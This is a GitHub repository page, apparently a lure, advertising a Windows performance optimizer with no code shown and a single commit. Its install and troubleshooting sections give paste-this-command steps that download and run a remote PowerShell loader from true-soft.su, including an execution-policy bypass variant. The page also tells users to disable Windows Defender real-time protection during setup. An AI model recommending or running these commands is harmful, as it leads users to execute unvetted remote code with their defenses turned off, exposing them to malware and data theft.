Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

Windows Performance Optimizer & System Tuning Utility

An advanced, open-source Windows configuration utility designed to maximize system responsiveness, minimize hardware latency, and streamline background processes. This lightweight tool provides a centralized interface for safe and effective operating system optimization.

Whether you are a PC gamer looking for a higher FPS baseline, a video editor needing maximum CPU/RAM availability, or a system administrator deploying a clean OS environment, this utility helps you achieve peak hardware efficiency.


🚀 Key Optimization Features

The utility automates standard administrative tasks to improve overall system throughput:

  • Hardware Latency Reduction: Fine-tunes system timers and interrupt handling for faster mouse and keyboard response times.
  • Resource Management: Reallocates CPU and RAM priorities to give foreground applications and video games maximum performance.
  • Storage Optimization: Safe disk cleanup and system file verification to free up NVMe/SSD space and maintain drive health.
  • Visual Effects Streamlining: Adjusts native desktop composition settings to lower GPU idle usage.
  • Service Automation: Disables unnecessary background tasks and startup items that slow down boot times.

🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell :

    • Press the Win + X keys simultaneously.
    • Select Terminal or Windows PowerShell from the context menu.
  2. Run the Installation Command: Copy, paste, and press Enter to run the following initialization command. This script will automatically configure the registry bypass and download all required packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Execution Policy Error (Script Blocked)

If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (Older PowerShell Versions)

If you are using an older environment where short aliases are missing, use the full system commands:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Block

Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.


关于 About

No description, website, or topics provided.
fps-booster-no-lagframe-rate-boostgame-booster-freeoptimize-windowsoptimizeroptimizer-toolpc-optimizationspeed-up-pcunattendedwininstallwindows-10-optimizationwindows-10-optimizerwindows-bloatwarewindows-optimizationwindows-optimization-toolwindows-optimizer-performance-latency-tweakswindows-performance-optimizerwindows-scriptwindows-scriptswinutil

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
1
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors